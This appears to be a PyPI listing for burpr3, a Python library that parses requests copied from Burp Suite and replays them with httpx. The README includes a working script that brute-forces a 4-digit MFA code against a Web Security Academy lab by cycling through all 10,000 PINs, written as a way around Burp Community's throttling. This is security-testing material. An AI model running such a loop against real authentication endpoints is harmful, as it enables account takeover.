burpr3


Nameburpr3 JSON
Version 0.0.2 PyPI version JSON
home_pagehttps://github.com/krystianbajno/burpr
SummaryA Burp Suite request parser, used for aid in assessing application security functionality.
upload_time2023-09-09 14:25:26
maintainer
docs_urlNone
authorKrystian Bajno
requires_python
licenseMIT
keywords burp suite burpsuite request parser
VCS
bugtrack_url
requirements No requirements were recorded.
Travis-CI No Travis.
coveralls test coverage No coveralls.
# What is it
A Burp Suite request parser, used as an aid in assessing application security functionality.

# Why I wrote it
To work around the throttling that Burp Suite Community applies to Intruder.

# Usage
Use the burpr.py module to parse a request copied from Burp Suite, then use the resulting object to extract its headers and body.

Supports parsing requests as strings and as .txt files.

```python
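import burpr
import httpx

# Load from string (req_string holds the raw request text copied from Burp Suite)
req = burpr.parse_string(req_string)

# Load from file
req = burpr.parse_file(req_file_path)

# clone the request, so the edits below do not touch the parsed original
req_clone = burpr.clone(req)

# change protocol to http1.1
req_clone.set_protocol(burpr.protocols.HTTP1_1)

# change transport to http
# NOTE(review): presumably this switches the request URL to plain http://, in
# which case the Cookie header and the body travel unencrypted - confirm.
req_clone.set_transport(burpr.transports.HTTP)

# modify the header
req_clone.set_header("Cookie", "session=modified_session_cookie")

# modify the parameter
req_clone.set_parameter("post-param", "AAABBBCCC")

# remove parameter
req_clone.remove_parameter("post-param")

# remove header
req_clone.remove_header("Cookie")

# adjust Content-Length for parameter change
burpr.prepare(req_clone)

# Send the clone that was edited and prepared, and let its protocol decide
# whether the client speaks HTTP/2. The with-block closes the client afterwards.
with httpx.Client(http2=req_clone.is_http2) as client:
  res = client.post(req_clone.url, headers=req_clone.headers, data=req_clone.body)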
```

# Examples
## Brute force broken MFA
```python
import burpr
import httpx
import itertools

# Raw request text as copied from Burp Suite. The host and the session cookie
# appear as the placeholder "xxxx". Content-Length is 13, which is the length
# of the body "mfa-code=4321". The r"""...""" raw string keeps the text exactly
# as pasted, so no character in it is treated as an escape sequence.
burp_request = r"""POST /login2 HTTP/2
Host: xxxx.web-security-academy.net
Cookie: verify=carlos; session=xxxx
Content-Length: 13
Cache-Control: max-age=0
Sec-Ch-Ua: 
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: ""
Upgrade-Insecure-Requests: 1
Origin: https://xxxx.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://xxxx.web-security-academy.net/login2
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

mfa-code=4321
"""

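def generate_pin_numbers():
  """Return every 4-digit code as a string, from "0000" to "9999" in order.

  Leading zeros are kept, so the list has exactly 10,000 entries of length 4.
  """
  # Iterating over the digit characters directly avoids the int -> str
  # conversion and the intermediate lists the join does not need.
  return [''.join(digits) for digits in itertools.product("0123456789", repeat=4)]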

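def brute_force_broken_mfa():
  """Replay the captured /login2 request once per candidate code.

  Parses ``burp_request``, then POSTs it with ``mfa-code`` set to each value
  from ``generate_pin_numbers()`` in turn, printing the status code and the
  code that was tried. The loop ends at the first response whose status is
  not 200.

  NOTE(review): the page does not say which status a correct code returns, so
  any non-200 reply (an error or a rate-limit response as well) ends the loop.

  The section heading calls the target's MFA "broken": the loop depends on the
  endpoint accepting every guess for the same session. A per-session attempt
  limit or lockout on the verification step bounds the number of guesses, and
  up to 10,000 POSTs to one path from one session is a pattern worth alerting
  on.
  """
  # Parse request from string
  req = burpr.parse_string(burp_request)

  # Match the client's protocol to the parsed request; the with-block closes
  # the client when the loop ends instead of leaving it open.
  with httpx.Client(http2=req.is_http2) as client:
    for pin in generate_pin_numbers():
      # Every candidate has 4 digits like the captured value, so the body
      # keeps the length stated in the captured Content-Length header.
      req.set_parameter("mfa-code", pin)

      # Send the request
      res = client.post(req.url, headers=req.headers, data=req.body)

      print(res.status_code, pin)

      if res.status_code != 200:
        break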

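# Run the example only when this file is executed as a script, so that merely
# importing it does not start sending requests.
if __name__ == "__main__":
  brute_force_broken_mfa()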
```

            

Raw data

            {
    "_id": null,
    "home_page": "https://github.com/krystianbajno/burpr",
    "name": "burpr3",
    "maintainer": "",
    "docs_url": null,
    "requires_python": "",
    "maintainer_email": "",
    "keywords": "burp suite burpsuite request parser",
    "author": "Krystian Bajno",
    "author_email": "krystian.bajno@gmail.com",
    "download_url": "https://files.pythonhosted.org/packages/bf/bc/8583b996b60a7a1e1d53f2207b00d3b6206e18d6fcf6b6859b2f5f5cb59a/burpr3-0.0.2.tar.gz",
    "platform": null,
    "description": "# What is it\r\nA Burp Suite request parser, used for aid in assessing application security functionality.\r\n\r\n# Why I wrote it\r\nTo bypass the throttling 'Burp Suite Community' does to the intruder.\r\n\r\n# Usage\r\nUse burpr.py module to parse the Burp Suite copied request. Then use the created object to extract headers and body.\r\n\r\nSupports parsing requests as strings and as .txt files.\r\n\r\n```python\r\nimport burpr\r\n\r\n# Load from string\r\nreq = burpr.parse_string(req_string)\r\n\r\n# Load from file\r\nreq = burpr.parse_file(req_file_path)\r\n\r\n# clone the request\r\nreq_clone = burpr.clone(req)\r\n\r\n# change protocol to http1.1\r\nreq_clone.set_protocol(burpr.protocols.HTTP1_1)\r\n\r\n# change transport to http\r\nreq_clone.set_transport(burpr.transports.HTTP)\r\n\r\n# modify the header\r\nreq_clone.set_header(\"Cookie\", \"session=modified_session_cookie\")\r\n\r\n# modify the parameter\r\nreq_clone.set_parameter(\"post-param\", \"AAABBBCCC\")\r\n\r\n# remove parameter\r\nreq_clone.remove_parameter(\"post-param\")\r\n\r\n# remove header\r\nreq_clone.remove_header(\"Cookie\")\r\n\r\n# adjust Content-Length for parameter change\r\nburpr.prepare(req_clone)\r\n\r\nclient = httpx.Client(http2=True)\r\nres = client.post(req.url, headers=req.headers, data=req.body)\r\n```\r\n\r\n# Examples\r\n## Brute force broken MFA\r\n```python\r\nimport burpr\r\nimport httpx\r\nimport itertools\r\n\r\nburp_request = r\"\"\"POST /login2 HTTP/2\r\nHost: xxxx.web-security-academy.net\r\nCookie: verify=carlos; session=xxxx\r\nContent-Length: 13\r\nCache-Control: max-age=0\r\nSec-Ch-Ua: \r\nSec-Ch-Ua-Mobile: ?0\r\nSec-Ch-Ua-Platform: \"\"\r\nUpgrade-Insecure-Requests: 1\r\nOrigin: https://xxxx.web-security-academy.net\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36\r\nAccept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\nSec-Fetch-Site: same-origin\r\nSec-Fetch-Mode: navigate\r\nSec-Fetch-User: ?1\r\nSec-Fetch-Dest: document\r\nReferer: https://xxxx.web-security-academy.net/login2\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\n\r\nmfa-code=4321\r\n\"\"\"\r\n\r\ndef generate_pin_numbers():\r\n  return [''.join(list([str(digit) for digit in permutation])) \r\n          for permutation in itertools.product(list(range(0, 10)), repeat=4)]\r\n\r\ndef brute_force_broken_mfa():\r\n  # Parse request from string\r\n  req = burpr.parse_string(burp_request)\r\n\r\n  # Create http client and check the protocol used\r\n  client = httpx.Client(http2=req.is_http2)\r\n\r\n  for pin in generate_pin_numbers():\r\n    # Modify the mfa-code parameter\r\n    req.set_parameter(\"mfa-code\", pin)\r\n\r\n    # Send the request\r\n    res = client.post(req.url, headers=req.headers, data=req.body)\r\n\r\n    print(res.status_code, pin)\r\n    \r\n    if (res.status_code != 200):\r\n      break\r\n\r\nbrute_force_broken_mfa()\r\n```\r\n",
    "bugtrack_url": null,
    "license": "MIT",
    "summary": "A Burp Suite request parser, used for aid in assessing application security functionality.",
    "version": "0.0.2",
    "project_urls": {
        "Homepage": "https://github.com/krystianbajno/burpr"
    },
    "split_keywords": [
        "burp",
        "suite",
        "burpsuite",
        "request",
        "parser"
    ],
    "urls": [
        {
            "comment_text": "",
            "digests": {
                "blake2b_256": "bfbc8583b996b60a7a1e1d53f2207b00d3b6206e18d6fcf6b6859b2f5f5cb59a",
                "md5": "981a46814bff79b9f7f738ab803f3068",
                "sha256": "0f58abbf6614ace6c6bda6c5818845ed0b5a3d8204175c83b01e9d6b881e9443"
            },
            "downloads": -1,
            "filename": "burpr3-0.0.2.tar.gz",
            "has_sig": false,
            "md5_digest": "981a46814bff79b9f7f738ab803f3068",
            "packagetype": "sdist",
            "python_version": "source",
            "requires_python": null,
            "size": 4668,
            "upload_time": "2023-09-09T14:25:26",
            "upload_time_iso_8601": "2023-09-09T14:25:26.638626Z",
            "url": "https://files.pythonhosted.org/packages/bf/bc/8583b996b60a7a1e1d53f2207b00d3b6206e18d6fcf6b6859b2f5f5cb59a/burpr3-0.0.2.tar.gz",
            "yanked": false,
            "yanked_reason": null
        }
    ],
    "upload_time": "2023-09-09 14:25:26",
    "github": true,
    "gitlab": false,
    "bitbucket": false,
    "codeberg": false,
    "github_user": "krystianbajno",
    "github_project": "burpr",
    "travis_ci": false,
    "coveralls": false,
    "github_actions": false,
    "requirements": [],
    "lcname": "burpr3"
}
        